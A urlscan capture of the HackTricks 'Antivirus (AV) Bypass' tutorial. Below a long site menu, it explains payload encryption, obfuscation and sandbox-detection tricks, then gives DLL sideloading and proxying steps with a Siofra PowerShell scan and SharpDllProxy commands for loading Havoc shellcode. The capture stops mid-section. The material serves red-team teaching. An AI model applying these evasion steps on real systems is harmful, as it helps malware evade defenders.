book.hacktricks.xyz
Open in
urlscan Pro
172.64.147.209
Public Scan
Submitted URL: http://book.hacktricks.xyz/windows-hardening/av-bypass/
Effective URL: https://book.hacktricks.xyz/windows-hardening/av-bypass
Submission: On December 06 via api from NL — Scanned from NL
Effective URL: https://book.hacktricks.xyz/windows-hardening/av-bypass
Submission: On December 06 via api from NL — Scanned from NL
Form analysis 0 forms found in the DOM
Text Content
HackTricks
HackTricks
HackTricksAfrikaans - HtChinese - HtEspañol - HtFrançais - HtGerman - HtGreek -
HtHindi - HtItalian - HtJapanese - HtKorean - HtPolish - HtPortuguês - HtSerbian
- HtSwahili - HtTurkish - HtUkranian - Ht
HackTricks TrainingTwitterLinkedinSponsor
More
HackTricks TrainingTwitterLinkedinSponsor
Ask or SearchCtrl + K
* 👾Welcome!
* HackTricks
* HackTricks Values & FAQ
* About the author
* 🤩Generic Methodologies & Resources
* Pentesting Methodology
* External Recon Methodology
* Wide Source Code Search
* Github Dorks & Leaks
* Pentesting Network
* DHCPv6
* EIGRP Attacks
* GLBP & HSRP Attacks
* IDS and IPS Evasion
* Lateral VLAN Segmentation Bypass
* Network Protocols Explained (ESP)
* Nmap Summary (ESP)
* Pentesting IPv6
* WebRTC DoS
* Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
* Spoofing SSDP and UPnP Devices with EvilSSDP
* Pentesting Wifi
* Evil Twin EAP-TLS
* Phishing Methodology
* Clone a Website
* Detecting Phishing
* Phishing Files & Documents
* Basic Forensic Methodology
* Baseline Monitoring
* Anti-Forensic Techniques
* Docker Forensics
* Image Acquisition & Mount
* Linux Forensics
* Malware Analysis
* Memory dump analysis
* Volatility - CheatSheet
* Partitions/File Systems/Carving
* File/Data Carving & Recovery Tools
* Pcap Inspection
* DNSCat pcap analysis
* Suricata & Iptables cheatsheet
* USB Keystrokes
* Wifi Pcap Analysis
* Wireshark tricks
* Specific Software/File-Type Tricks
* Decompile compiled python binaries (exe, elf) - Retreive from .pyc
* Browser Artifacts
* Deofuscation vbs (cscript.exe)
* Local Cloud Storage
* Office file analysis
* PDF File analysis
* PNG tricks
* Video and Audio file analysis
* ZIPs tricks
* Windows Artifacts
* Interesting Windows Registry Keys
* Brute Force - CheatSheet
* Python Sandbox Escape & Pyscript
* Bypass Python sandboxes
* LOAD_NAME / LOAD_CONST opcode OOB Read
* Class Pollution (Python's Prototype Pollution)
* Python Internal Read Gadgets
* Pyscript
* venv
* Web Requests
* Bruteforce hash (few chars)
* Basic Python
* Exfiltration
* Tunneling and Port Forwarding
* Threat Modeling
* Search Exploits
* Reverse Shells (Linux, Windows, MSFVenom)
* MSFVenom - CheatSheet
* Reverse Shells - Windows
* Reverse Shells - Linux
* Expose local to the internet
* Full TTYs
* 🐧Linux Hardening
* Checklist - Linux Privilege Escalation
* Linux Privilege Escalation
* Arbitrary File Write to Root
* Cisco - vmanage
* Containerd (ctr) Privilege Escalation
* D-Bus Enumeration & Command Injection Privilege Escalation
* Docker Security
* Abusing Docker Socket for Privilege Escalation
* AppArmor
* AuthZ& AuthN - Docker Access Authorization Plugin
* CGroups
* Docker --privileged
* Docker Breakout / Privilege Escalation
* release_agent exploit - Relative Paths to PIDs
* Docker release_agent cgroups escape
* Sensitive Mounts
* Namespaces
* CGroup Namespace
* IPC Namespace
* PID Namespace
* Mount Namespace
* Network Namespace
* Time Namespace
* User Namespace
* UTS Namespace
* Seccomp
* Weaponizing Distroless
* Escaping from Jails
* euid, ruid, suid
* Interesting Groups - Linux Privesc
* lxd/lxc Group - Privilege escalation
* Logstash
* ld.so privesc exploit example
* Linux Active Directory
* Linux Capabilities
* NFS no_root_squash/no_all_squash misconfiguration PE
* Node inspector/CEF debug abuse
* Payloads to execute
* RunC Privilege Escalation
* SELinux
* Socket Command Injection
* Splunk LPE and Persistence
* SSH Forward Agent exploitation
* Wildcards Spare tricks
* Useful Linux Commands
* Bypass Linux Restrictions
* Bypass FS protections: read-only / no-exec / Distroless
* DDexec / EverythingExec
* Linux Environment Variables
* Linux Post-Exploitation
* PAM - Pluggable Authentication Modules
* FreeIPA Pentesting
* 🍏MacOS Hardening
* macOS Security & Privilege Escalation
* macOS Apps - Inspecting, debugging and Fuzzing
* Objects in memory
* Introduction to x64
* Introduction to ARM64v8
* macOS AppleFS
* macOS Bypassing Firewalls
* macOS Defensive Apps
* macOS GCD - Grand Central Dispatch
* macOS Kernel & System Extensions
* macOS IOKit
* macOS Kernel Extensions & Debugging
* macOS Kernel Vulnerabilities
* macOS System Extensions
* macOS Network Services & Protocols
* macOS File Extension & URL scheme app handlers
* macOS Files, Folders, Binaries & Memory
* macOS Bundles
* macOS Installers Abuse
* macOS Memory Dumping
* macOS Sensitive Locations & Interesting Daemons
* macOS Universal binaries & Mach-O Format
* macOS Objective-C
* macOS Privilege Escalation
* macOS Process Abuse
* macOS Dirty NIB
* macOS Chromium Injection
* macOS Electron Applications Injection
* macOS Function Hooking
* macOS IPC - Inter Process Communication
* macOS MIG - Mach Interface Generator
* macOS XPC
* macOS XPC Authorization
* macOS XPC Connecting Process Check
* macOS PID Reuse
* macOS xpc_connection_get_audit_token Attack
* macOS Thread Injection via Task port
* macOS Java Applications Injection
* macOS Library Injection
* macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES
* macOS Dyld Process
* macOS Perl Applications Injection
* macOS Python Applications Injection
* macOS Ruby Applications Injection
* macOS .Net Applications Injection
* macOS Security Protections
* macOS Gatekeeper / Quarantine / XProtect
* macOS Launch/Environment Constraints & Trust Cache
* macOS Sandbox
* macOS Default Sandbox Debug
* macOS Sandbox Debug & Bypass
* macOS Office Sandbox Bypasses
* macOS Authorizations DB & Authd
* macOS SIP
* macOS TCC
* macOS Apple Events
* macOS TCC Bypasses
* macOS Apple Scripts
* macOS TCC Payloads
* macOS Dangerous Entitlements & TCC perms
* macOS - AMFI - AppleMobileFileIntegrity
* macOS MACF - Mandatory Access Control Framework
* macOS Code Signing
* macOS FS Tricks
* macOS xattr-acls extra stuff
* macOS Users & External Accounts
* macOS Red Teaming
* macOS MDM
* Enrolling Devices in Other Organisations
* macOS Serial Number
* macOS Keychain
* macOS Useful Commands
* macOS Auto Start
* 🪟Windows Hardening
* Checklist - Local Windows Privilege Escalation
* Windows Local Privilege Escalation
* Abusing Tokens
* Access Tokens
* ACLs - DACLs/SACLs/ACEs
* AppendData/AddSubdirectory permission over service registry
* Create MSI with WIX
* COM Hijacking
* Dll Hijacking
* Writable Sys Path +Dll Hijacking Privesc
* DPAPI - Extracting Passwords
* From High Integrity to SYSTEM with Name Pipes
* Integrity Levels
* JuicyPotato
* Leaked Handle Exploitation
* MSI Wrapper
* Named Pipe Client Impersonation
* Privilege Escalation with Autoruns
* RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
* SeDebug + SeImpersonate copy token
* SeImpersonate from High To System
* Windows C Payloads
* Active Directory Methodology
* Abusing Active Directory ACLs/ACEs
* Shadow Credentials
* AD Certificates
* AD CS Account Persistence
* AD CS Domain Escalation
* AD CS Domain Persistence
* AD CS Certificate Theft
* AD information in printers
* AD DNS Records
* ASREPRoast
* BloodHound & Other AD Enum Tools
* Constrained Delegation
* Custom SSP
* DCShadow
* DCSync
* Diamond Ticket
* DSRM Credentials
* External Forest Domain - OneWay (Inbound) or bidirectional
* External Forest Domain - One-Way (Outbound)
* Golden Ticket
* Kerberoast
* Kerberos Authentication
* Kerberos Double Hop Problem
* LAPS
* MSSQL AD Abuse
* Over Pass the Hash/Pass the Key
* Pass the Ticket
* Password Spraying / Brute Force
* PrintNightmare
* Force NTLM Privileged Authentication
* Privileged Groups
* RDP Sessions Abuse
* Resource-based Constrained Delegation
* Security Descriptors
* SID-History Injection
* Silver Ticket
* Skeleton Key
* Unconstrained Delegation
* Windows Security Controls
* UAC - User Account Control
* NTLM
* Places to steal NTLM creds
* Lateral Movement
* AtExec / SchtasksExec
* DCOM Exec
* PsExec/Winexec/ScExec
* SmbExec/ScExec
* WinRM
* WmiExec
* Pivoting to the Cloud
* Stealing Windows Credentials
* Windows Credentials Protections
* Mimikatz
* WTS Impersonator
* Basic Win CMD for Pentesters
* Basic PowerShell for Pentesters
* PowerView/SharpView
* Antivirus (AV) Bypass
* 📱Mobile Pentesting
* Android APK Checklist
* Android Applications Pentesting
* Android Applications Basics
* Android Task Hijacking
* ADB Commands
* APK decompilers
* AVD - Android Virtual Device
* Bypass Biometric Authentication (Android)
* content:// protocol
* Drozer Tutorial
* Exploiting Content Providers
* Exploiting a debuggeable application
* Frida Tutorial
* Frida Tutorial 1
* Frida Tutorial 2
* Frida Tutorial 3
* Objection Tutorial
* Google CTF 2018 - Shall We Play a Game?
* Install Burp Certificate
* Intent Injection
* Make APK Accept CA Certificate
* Manual DeObfuscation
* React Native Application
* Reversing Native Libraries
* Smali - Decompiling/[Modifying]/Compiling
* Spoofing your location in Play Store
* Tapjacking
* Webview Attacks
* iOS Pentesting Checklist
* iOS Pentesting
* iOS App Extensions
* iOS Basics
* iOS Basic Testing Operations
* iOS Burp Suite Configuration
* iOS Custom URI Handlers / Deeplinks / Custom Schemes
* iOS Extracting Entitlements From Compiled Application
* iOS Frida Configuration
* iOS Hooking With Objection
* iOS Protocol Handlers
* iOS Serialisation and Encoding
* iOS Testing Environment
* iOS UIActivity Sharing
* iOS Universal Links
* iOS UIPasteboard
* iOS WebViews
* Cordova Apps
* Xamarin Apps
* 👽Network Services Pentesting
* Pentesting JDWP - Java Debug Wire Protocol
* Pentesting Printers
* Pentesting SAP
* Pentesting VoIP
* Basic VoIP Protocols
* SIP (Session Initiation Protocol)
* Pentesting Remote GdbServer
* 7/tcp/udp - Pentesting Echo
* 21 - Pentesting FTP
* FTP Bounce attack - Scan
* FTP Bounce - Download 2ºFTP file
* 22 - Pentesting SSH/SFTP
* 23 - Pentesting Telnet
* 25,465,587 - Pentesting SMTP/s
* SMTP Smuggling
* SMTP - Commands
* 43 - Pentesting WHOIS
* 49 - Pentesting TACACS+
* 53 - Pentesting DNS
* 69/UDP TFTP/Bittorrent-tracker
* 79 - Pentesting Finger
* 80,443 - Pentesting Web Methodology
* 403 & 401 Bypasses
* AEM - Adobe Experience Cloud
* Angular
* Apache
* Artifactory Hacking guide
* Bolt CMS
* Buckets
* Firebase Database
* CGI
* DotNetNuke (DNN)
* Drupal
* Drupal RCE
* Electron Desktop Apps
* Electron contextIsolation RCE via preload code
* Electron contextIsolation RCE via Electron internal code
* Electron contextIsolation RCE via IPC
* Flask
* NodeJS Express
* Git
* Golang
* GWT - Google Web Toolkit
* Grafana
* GraphQL
* H2 - Java SQL database
* IIS - Internet Information Services
* ImageMagick Security
* JBOSS
* Jira & Confluence
* Joomla
* JSP
* Laravel
* Moodle
* Nginx
* NextJS
* PHP Tricks
* PHP - Useful Functions & disable_functions/open_basedir bypass
* disable_functions bypass - php-fpm/FastCGI
* disable_functions bypass - dl function
* disable_functions bypass - PHP 7.0-7.4 (*nix only)
* disable_functions bypass - Imagick <= 3.3.0 PHP >= 5.4 Exploit
* disable_functions - PHP 5.x Shellshock Exploit
* disable_functions - PHP 5.2.4 ionCube extension Exploit
* disable_functions bypass - PHP <= 5.2.9 on windows
* disable_functions bypass - PHP 5.2.4 and 5.2.5 PHP cURL
* disable_functions bypass - PHP safe_mode bypass via proc_open()
and custom environment Exploit
* disable_functions bypass - PHP Perl Extension Safe_mode Bypass
Exploit
* disable_functions bypass - PHP 5.2.3 - Win32std ext Protections
Bypass
* disable_functions bypass - PHP 5.2 - FOpen Exploit
* disable_functions bypass - via mem
* disable_functions bypass - mod_cgi
* disable_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl_exec
* PHP - RCE abusing object creation: new $_GET["a"]($_GET["b"])
* PHP SSRF
* PrestaShop
* Python
* Rocket Chat
* Special HTTP headers
* Source code Review / SAST Tools
* Spring Actuators
* Symfony
* Tomcat
* Basic Tomcat Info
* Uncovering CloudFlare
* VMWare (ESX, VCenter...)
* Web API Pentesting
* WebDav
* Werkzeug / Flask Debug
* Wordpress
* 88tcp/udp - Pentesting Kerberos
* Harvesting tickets from Windows
* Harvesting tickets from Linux
* 110,995 - Pentesting POP
* 111/TCP/UDP - Pentesting Portmapper
* 113 - Pentesting Ident
* 123/udp - Pentesting NTP
* 135, 593 - Pentesting MSRPC
* 137,138,139 - Pentesting NetBios
* 139,445 - Pentesting SMB
* rpcclient enumeration
* 143,993 - Pentesting IMAP
* 161,162,10161,10162/udp - Pentesting SNMP
* Cisco SNMP
* SNMP RCE
* 194,6667,6660-7000 - Pentesting IRC
* 264 - Pentesting Check Point FireWall-1
* 389, 636, 3268, 3269 - Pentesting LDAP
* 500/udp - Pentesting IPsec/IKE VPN
* 502 - Pentesting Modbus
* 512 - Pentesting Rexec
* 513 - Pentesting Rlogin
* 514 - Pentesting Rsh
* 515 - Pentesting Line Printer Daemon (LPD)
* 548 - Pentesting Apple Filing Protocol (AFP)
* 554,8554 - Pentesting RTSP
* 623/UDP/TCP - IPMI
* 631 - Internet Printing Protocol(IPP)
* 700 - Pentesting EPP
* 873 - Pentesting Rsync
* 1026 - Pentesting Rusersd
* 1080 - Pentesting Socks
* 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP
* 1414 - Pentesting IBM MQ
* 1433 - Pentesting MSSQL - Microsoft SQL Server
* Types of MSSQL Users
* 1521,1522-1529 - Pentesting Oracle TNS Listener
* 1723 - Pentesting PPTP
* 1883 - Pentesting MQTT (Mosquitto)
* 2049 - Pentesting NFS Service
* 2301,2381 - Pentesting Compaq/HP Insight Manager
* 2375, 2376 Pentesting Docker
* 3128 - Pentesting Squid
* 3260 - Pentesting ISCSI
* 3299 - Pentesting SAPRouter
* 3306 - Pentesting Mysql
* 3389 - Pentesting RDP
* 3632 - Pentesting distcc
* 3690 - Pentesting Subversion (svn server)
* 3702/UDP - Pentesting WS-Discovery
* 4369 - Pentesting Erlang Port Mapper Daemon (epmd)
* 4786 - Cisco Smart Install
* 4840 - OPC Unified Architecture
* 5000 - Pentesting Docker Registry
* 5353/UDP Multicast DNS (mDNS) and DNS-SD
* 5432,5433 - Pentesting Postgresql
* 5439 - Pentesting Redshift
* 5555 - Android Debug Bridge
* 5601 - Pentesting Kibana
* 5671,5672 - Pentesting AMQP
* 5800,5801,5900,5901 - Pentesting VNC
* 5984,6984 - Pentesting CouchDB
* 5985,5986 - Pentesting WinRM
* 5985,5986 - Pentesting OMI
* 6000 - Pentesting X11
* 6379 - Pentesting Redis
* 8009 - Pentesting Apache JServ Protocol (AJP)
* 8086 - Pentesting InfluxDB
* 8089 - Pentesting Splunkd
* 8333,18333,38333,18444 - Pentesting Bitcoin
* 9000 - Pentesting FastCGI
* 9001 - Pentesting HSQLDB
* 9042/9160 - Pentesting Cassandra
* 9100 - Pentesting Raw Printing (JetDirect, AppSocket, PDL-datastream)
* 9200 - Pentesting Elasticsearch
* 10000 - Pentesting Network Data Management Protocol (ndmp)
* 11211 - Pentesting Memcache
* Memcache Commands
* 15672 - Pentesting RabbitMQ Management
* 24007,24008,24009,49152 - Pentesting GlusterFS
* 27017,27018 - Pentesting MongoDB
* 44134 - Pentesting Tiller (Helm)
* 44818/UDP/TCP - Pentesting EthernetIP
* 47808/udp - Pentesting BACNet
* 50030,50060,50070,50075,50090 - Pentesting Hadoop
* 🕸️Pentesting Web
* Web Vulnerabilities Methodology
* Reflecting Techniques - PoCs and Polygloths CheatSheet
* Web Vulns List
* 2FA/MFA/OTP Bypass
* Account Takeover
* Browser Extension Pentesting Methodology
* BrowExt - ClickJacking
* BrowExt - permissions & host_permissions
* BrowExt - XSS Example
* Bypass Payment Process
* Captcha Bypass
* Cache Poisoning and Cache Deception
* Cache Poisoning via URL discrepancies
* Cache Poisoning to DoS
* Clickjacking
* Client Side Template Injection (CSTI)
* Client Side Path Traversal
* Command Injection
* Content Security Policy (CSP) Bypass
* CSP bypass: self + 'unsafe-inline' with Iframes
* Cookies Hacking
* Cookie Tossing
* Cookie Jar Overflow
* Cookie Bomb
* CORS - Misconfigurations & Bypass
* CRLF (%0D%0A) Injection
* CSRF (Cross Site Request Forgery)
* Dangling Markup - HTML scriptless injection
* SS-Leaks
* Dependency Confusion
* Deserialization
* NodeJS - __proto__ & prototype Pollution
* Client Side Prototype Pollution
* Express Prototype Pollution Gadgets
* Prototype Pollution to RCE
* Java JSF ViewState (.faces) Deserialization
* Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
* Basic Java Deserialization (ObjectInputStream, readObject)
* PHP - Deserialization + Autoload Classes
* CommonsCollection1 Payload - Java Transformers to Rutime exec() and
Thread Sleep
* Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper,
and Json.Net)
* Exploiting __VIEWSTATE knowing the secrets
* Exploiting __VIEWSTATE without knowing the secrets
* Python Yaml Deserialization
* JNDI - Java Naming and Directory Interface & Log4Shell
* Ruby Class Pollution
* Domain/Subdomain takeover
* Email Injections
* File Inclusion/Path traversal
* phar:// deserialization
* LFI2RCE via PHP Filters
* LFI2RCE via Nginx temp files
* LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS
* LFI2RCE via Segmentation Fault
* LFI2RCE via phpinfo()
* LFI2RCE Via temp file uploads
* LFI2RCE via Eternal waiting
* LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure
* File Upload
* PDF Upload - XXE and CORS bypass
* Formula/CSV/Doc/LaTeX/GhostScript Injection
* gRPC-Web Pentest
* HTTP Connection Contamination
* HTTP Connection Request Smuggling
* HTTP Request Smuggling / HTTP Desync Attack
* Browser HTTP Request Smuggling
* Request Smuggling in HTTP/2 Downgrades
* HTTP Response Smuggling / Desync
* Upgrade Header Smuggling
* hop-by-hop headers
* IDOR
* JWT Vulnerabilities (Json Web Tokens)
* LDAP Injection
* Login Bypass
* Login bypass List
* NoSQL injection
* OAuth to Account takeover
* Open Redirect
* ORM Injection
* Parameter Pollution | JSON Injection
* Phone Number Injections
* PostMessage Vulnerabilities
* Blocking main page to steal postmessage
* Bypassing SOP with Iframes - 1
* Bypassing SOP with Iframes - 2
* Steal postmessage modifying iframe location
* Proxy / WAF Protections Bypass
* Race Condition
* Rate Limit Bypass
* Registration & Takeover Vulnerabilities
* Regular expression Denial of Service - ReDoS
* Reset/Forgotten Password Bypass
* Reverse Tab Nabbing
* SAML Attacks
* SAML Basics
* Server Side Inclusion/Edge Side Inclusion Injection
* SQL Injection
* MS Access SQL Injection
* MSSQL Injection
* MySQL injection
* MySQL File priv to SSRF/RCE
* Oracle injection
* Cypher Injection (neo4j)
* PostgreSQL injection
* dblink/lo_import data exfiltration
* PL/pgSQL Password Bruteforce
* Network - Privesc, Port Scanner and NTLM chanllenge response
disclosure
* Big Binary Files Upload (PostgreSQL)
* RCE with PostgreSQL Languages
* RCE with PostgreSQL Extensions
* SQLMap - CheatSheet
* Second Order Injection - SQLMap
* SSRF (Server Side Request Forgery)
* URL Format Bypass
* SSRF Vulnerable Platforms
* Cloud SSRF
* SSTI (Server Side Template Injection)
* EL - Expression Language
* Jinja2 SSTI
* Timing Attacks
* Unicode Injection
* Unicode Normalization
* UUID Insecurities
* WebSocket Attacks
* Web Tool - WFuzz
* XPATH injection
* XSLT Server Side Injection (Extensible Stylesheet Language Transformations)
* XXE - XEE - XML External Entity
* XSS (Cross Site Scripting)
* Abusing Service Workers
* Chrome Cache to XSS
* Debugging Client Side JS
* Dom Clobbering
* DOM Invader
* DOM XSS
* Iframes in XSS, CSP and SOP
* Integer Overflow
* JS Hoisting
* Misc JS Tricks & Relevant Info
* PDF Injection
* Server Side XSS (Dynamic PDF)
* Shadow DOM
* SOME - Same Origin Method Execution
* Sniff Leak
* Steal Info JS
* XSS in Markdown
* XSSI (Cross-Site Script Inclusion)
* XS-Search/XS-Leaks
* Connection Pool Examples
* Connection Pool by Destination Example
* Cookie Bomb + Onerror XS Leak
* URL Max Length - Client Side
* performance.now example
* performance.now + Force heavy task
* Event Loop Blocking + Lazy images
* JavaScript Execution XS Leak
* CSS Injection
* CSS Injection Code
* Iframe Traps
* ⛈️Cloud Security
* Pentesting Kubernetes
* Pentesting Cloud (AWS, GCP, Az...)
* Pentesting CI/CD (Github, Jenkins, Terraform...)
* 😎Hardware/Physical Access
* Physical Attacks
* Escaping from KIOSKs
* Firmware Analysis
* Bootloader testing
* Firmware Integrity
* 🎯Binary Exploitation
* Basic Stack Binary Exploitation Methodology
* ELF Basic Information
* Exploiting Tools
* PwnTools
* Stack Overflow
* Pointer Redirecting
* Ret2win
* Ret2win - arm64
* Stack Shellcode
* Stack Shellcode - arm64
* Stack Pivoting - EBP2Ret - EBP chaining
* Uninitialized Variables
* ROP - Return Oriented Programing
* BROP - Blind Return Oriented Programming
* Ret2csu
* Ret2dlresolve
* Ret2esp / Ret2reg
* Ret2lib
* Leaking libc address with ROP
* Leaking libc - template
* One Gadget
* Ret2lib + Printf leak - arm64
* Ret2syscall
* Ret2syscall - ARM64
* Ret2vDSO
* SROP - Sigreturn-Oriented Programming
* SROP - ARM64
* Array Indexing
* Integer Overflow
* Format Strings
* Format Strings - Arbitrary Read Example
* Format Strings Template
* Libc Heap
* Bins & Memory Allocations
* Heap Memory Functions
* free
* malloc & sysmalloc
* unlink
* Heap Functions Security Checks
* Use After Free
* First Fit
* Double Free
* Overwriting a freed chunk
* Heap Overflow
* Unlink Attack
* Fast Bin Attack
* Unsorted Bin Attack
* Large Bin Attack
* Tcache Bin Attack
* Off by one overflow
* House of Spirit
* House of Lore | Small bin Attack
* House of Einherjar
* House of Force
* House of Orange
* House of Rabbit
* House of Roman
* Common Binary Exploitation Protections & Bypasses
* ASLR
* Ret2plt
* Ret2ret & Reo2pop
* CET & Shadow Stack
* Libc Protections
* Memory Tagging Extension (MTE)
* No-exec / NX
* PIE
* BF Addresses in the Stack
* Relro
* Stack Canaries
* BF Forked & Threaded Stack Canaries
* Print Stack Canary
* Write What Where 2 Exec
* WWW2Exec - atexit()
* WWW2Exec - .dtors & .fini_array
* WWW2Exec - GOT/PLT
* WWW2Exec - __malloc_hook & __free_hook
* Common Exploiting Problems
* Windows Exploiting (Basic Guide - OSCP lvl)
* iOS Exploiting
* 🔩Reversing
* Reversing Tools & Basic Methods
* Angr
* Angr - Examples
* Z3 - Satisfiability Modulo Theories (SMT)
* Cheat Engine
* Blobrunner
* Common API used in Malware
* Word Macros
* 🔮Crypto & Stego
* Cryptographic/Compression Algorithms
* Unpacking binaries
* Certificates
* Cipher Block Chaining CBC-MAC
* Crypto CTFs Tricks
* Electronic Code Book (ECB)
* Hash Length Extension Attack
* Padding Oracle
* RC4 - Encrypt&Decrypt
* Stego Tricks
* Esoteric languages
* Blockchain & Crypto Currencies
* 🦂C2
* Salseo
* ICMPsh
* Cobalt Strike
* ✍️TODO
* Other Big References
* Rust Basics
* More Tools
* MISC
* Pentesting DNS
* Hardware Hacking
* I2C
* UART
* Radio
* JTAG
* SPI
* Industrial Control Systems Hacking
* Modbus Protocol
* Radio Hacking
* Pentesting RFID
* Infrared
* Sub-GHz RF
* iButton
* Flipper Zero
* FZ - NFC
* FZ - Sub-GHz
* FZ - Infrared
* FZ - iButton
* FZ - 125kHz RFID
* Proxmark 3
* FISSURE - The RF Framework
* Low-Power Wide Area Network
* Pentesting BLE - Bluetooth Low Energy
* Industrial Control Systems Hacking
* Test LLMs
* LLM Training
* 0. Basic LLM Concepts
* 1. Tokenizing
* 2. Data Sampling
* 3. Token Embeddings
* 4. Attention Mechanisms
* 5. LLM Architecture
* 6. Pre-training & Loading models
* 7.0. LoRA Improvements in fine-tuning
* 7.1. Fine-Tuning for Classification
* 7.2. Fine-Tuning to follow instructions
* Burp Suite
* Other Web Tricks
* Interesting HTTP
* Android Forensics
* TR-069
* 6881/udp - Pentesting BitTorrent
* Online Platforms with API
* Stealing Sensitive Information Disclosure from a Web
* Post Exploitation
* Investment Terms
* Cookies Policy
Powered by GitBook
On this page
* AV Evasion Methodology
* Static detection
* Dynamic analysis
* EXEs vs DLLs
* DLL Sideloading & Proxying
* Freeze
* AMSI (Anti-Malware Scan Interface)
* Obfuscation
* SmartScreen & MoTW
* C# Assembly Reflection
* Using Other Programming Languages
* Advanced Evasion
* Old Techniques
* Check which parts Defender finds as malicious
* Telnet Server
* UltraVNC
* GreatSCT
* Compiling our own reverse shell
* C# using compiler
* C++
* Using python for build injectors example:
* Other tools
* More
Was this helpful?
Edit on GitHub
Frontend Masters – Master Web Development Skills with Expert-Led Courses!
Sponsored via GitBook
ANTIVIRUS (AV) BYPASS
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
* Check the subscription plans!
* Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦
@hacktricks_live.
* Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud
github repos.
If you are interested in hacking career and hack the unhackable - we are hiring!
(fluent polish written and spoken required).
Careers | stmcyber.com | penetration testingstmcyber.com
This page was written by @m2rc_p!
AV EVASION METHODOLOGY
Currently, AVs use different methods for checking if a file is malicious or not,
static detection, dynamic analysis, and for the more advanced EDRs, behavioural
analysis.
STATIC DETECTION
Static detection is achieved by flagging known malicious strings or arrays of
bytes in a binary or script, and also extracting information from the file
itself (e.g. file description, company name, digital signatures, icon, checksum,
etc.). This means that using known public tools may get you caught more easily,
as they've probably been analyzed and flagged as malicious. There are a couple
of ways of getting around this sort of detection:
* Encryption
If you encrypt the binary, there will be no way for AV of detecting your
program, but you will need some sort of loader to decrypt and run the program in
memory.
* Obfuscation
Sometimes all you need to do is change some strings in your binary or script to
get it past AV, but this can be a time-consuming task depending on what you're
trying to obfuscate.
* Custom tooling
If you develop your own tools, there will be no known bad signatures, but this
takes a lot of time and effort.
A good way for checking against Windows Defender static detection is
ThreatCheck. It basically splits the file into multiple segments and then tasks
Defender to scan each one individually, this way, it can tell you exactly what
are the flagged strings or bytes in your binary.
I highly recommend you check out this YouTube playlist about practical AV
Evasion.
DYNAMIC ANALYSIS
Dynamic analysis is when the AV runs your binary in a sandbox and watches for
malicious activity (e.g. trying to decrypt and read your browser's passwords,
performing a minidump on LSASS, etc.). This part can be a bit trickier to work
with, but here are some things you can do to evade sandboxes.
* Sleep before execution Depending on how it's implemented, it can be a great
way of bypassing AV's dynamic analysis. AV's have a very short time to scan
files to not interrupt the user's workflow, so using long sleeps can disturb
the analysis of binaries. The problem is that many AV's sandboxes can just
skip the sleep depending on how it's implemented.
* Checking machine's resources Usually Sandboxes have very little resources to
work with (e.g. < 2GB RAM), otherwise they could slow down the user's
machine. You can also get very creative here, for example by checking the
CPU's temperature or even the fan speeds, not everything will be implemented
in the sandbox.
* Machine-specific checks If you want to target a user who's workstation is
joined to the "contoso.local" domain, you can do a check on the computer's
domain to see if it matches the one you've specified, if it doesn't, you can
make your program exit.
It turns out that Microsoft Defender's Sandbox computername is HAL9TH, so, you
can check for the computer name in your malware before detonation, if the name
matches HAL9TH, it means you're inside defender's sandbox, so you can make your
program exit.
source: https://youtu.be/StSLxFbVz0M?t=1439
Some other really good tips from @mgeeky for going against Sandboxes
Red Team VX Discord #malware-dev channel
As we've said before in this post, public tools will eventually get detected,
so, you should ask yourself something:
For example, if you want to dump LSASS, do you really need to use mimikatz? Or
could you use a different project which is lesser known and also dumps LSASS.
The right answer is probably the latter. Taking mimikatz as an example, it's
probably one of, if not the most flagged piece of malware by AVs and EDRs, while
the project itself is super cool, it's also a nightmare to work with it to get
around AVs, so just look for alternatives for what you're trying to achieve.
When modifying your payloads for evasion, make sure to turn off automatic sample
submission in defender, and please, seriously, DO NOT UPLOAD TO VIRUSTOTAL if
your goal is achieving evasion in the long run. If you want to check if your
payload gets detected by a particular AV, install it on a VM, try to turn off
the automatic sample submission, and test it there until you're satisfied with
the result.
EXES VS DLLS
Whenever it's possible, always prioritize using DLLs for evasion, in my
experience, DLL files are usually way less detected and analyzed, so it's a very
simple trick to use in order to avoid detection in some cases (if your payload
has some way of running as a DLL of course).
As we can see in this image, a DLL Payload from Havoc has a detection rate of
4/26 in antiscan.me, while the EXE payload has a 7/26 detection rate.
antiscan.me comparison of a normal Havoc EXE payload vs a normal Havoc DLL
Now we'll show some tricks you can use with DLL files to be much more
stealthier.
DLL SIDELOADING & PROXYING
DLL Sideloading takes advantage of the DLL search order used by the loader by
positioning both the victim application and malicious payload(s) alongside each
other.
You can check for programs susceptible to DLL Sideloading using Siofra and the
following powershell script:
Copy
Get-ChildItem -Path "C:\Program Files\" -Filter *.exe -Recurse -File -Name| ForEach-Object {
$binarytoCheck = "C:\Program Files\" + $_
C:\Users\user\Desktop\Siofra64.exe --mode file-scan --enum-dependency --dll-hijack -f $binarytoCheck
}
This command will output the list of programs susceptible to DLL hijacking
inside "C:\Program Files\" and the DLL files they try to load.
I highly recommend you explore DLL Hijackable/Sideloadable programs yourself,
this technique is pretty stealthy done properly, but if you use publicly known
DLL Sideloadable programs, you may get caught easily.
Just by placing a malicious DLL with the name a program expects to load, won't
load your payload, as the program expects some specific functions inside that
DLL, to fix this issue, we'll use another technique called DLL
Proxying/Forwarding.
DLL Proxying forwards the calls a program makes from the proxy (and malicious)
DLL to the original DLL, thus preserving the program's functionality and being
able to handle the execution of your payload.
I will be using the SharpDLLProxy project from @flangvik
These are the steps I followed:
Copy
1. Find an application vulnerable to DLL Sideloading (siofra or using Process Hacker)
2. Generate some shellcode (I used Havoc C2)
3. (Optional) Encode your shellcode using Shikata Ga Nai (https://github.com/EgeBalci/sgn)
4. Use SharpDLLProxy to create the proxy dll (.\SharpDllProxy.exe --dll .\mimeTools.dll --payload .\demon.bin)
The last command will give us 2 files: a DLL source code template, and the
original renamed DLL.
